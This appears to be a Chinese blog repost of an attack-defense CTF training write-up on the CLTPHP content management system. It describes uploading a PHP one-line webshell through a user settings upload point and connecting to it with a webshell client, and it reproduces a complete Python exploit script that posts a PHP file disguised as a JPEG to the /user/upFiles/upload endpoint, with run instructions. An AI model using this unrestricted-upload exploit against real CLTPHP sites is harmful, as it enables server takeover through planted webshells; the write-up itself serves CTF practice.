CLTPHP 漏洞

前言

awd小组的第一次训练

0x01

首先看一下主界面
1619145-20190725143013265-1445885038.png

使用的应该是PHP模板,随便翻一下找到一个注册界面
1619145-20190725143319315-107501411.png

随便注册一个用户,登陆后在设置里找到一个上传点
1619145-20190725143838436-1523023949.png

上传我们的一句话木马
1619145-20190725144514072-637022879.png

查看返回包,上传成功
1619145-20190725144807628-1018613579.png

访问失败,猜测返回路径可能不是绝对路径
1619145-20190725145226446-2107074733.png
通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success!
1619145-20190725145716693-1711890452.png
菜刀连接
1619145-20190725160632134-1616614081.png

0x02

换个思路,网站应该是开源的,百度搜一下关键词,找到一个 payload

#!/usr/bin/python
#-*- coding: UTF-8 -*-
#Author:Bypass
#Date:2018.03.01
import requests
import sys

def CLPHP_upload(url):
        header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' ,
                                'X-Requested-With': 'XMLHttpRequest',} 
        geturl = url+"/user/upFiles/upload"
        files ={'file':('1.php',open('1.php','rb'),'image/jpeg')}
        res = requests.post(geturl, files=files,headers=header)
        print res.text

if __name__ == "__main__":
        if len(sys.argv) == 2:
                url=sys.argv[1]
                CLPHP_upload(url)
                sys.exit(0)
        else:
                print ("usage: %s xxx.com " % sys.argv[0])
                sys.exit(-1)

使用方法:把payload.py和一句话.php放到同一文件夹下,
1619145-20190725153254217-79267921.png

cmd执行 python payload.py url
1619145-20190725155717522-1632245050.png

转载于:https://www.cnblogs.com/unixcs/p/11244463.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值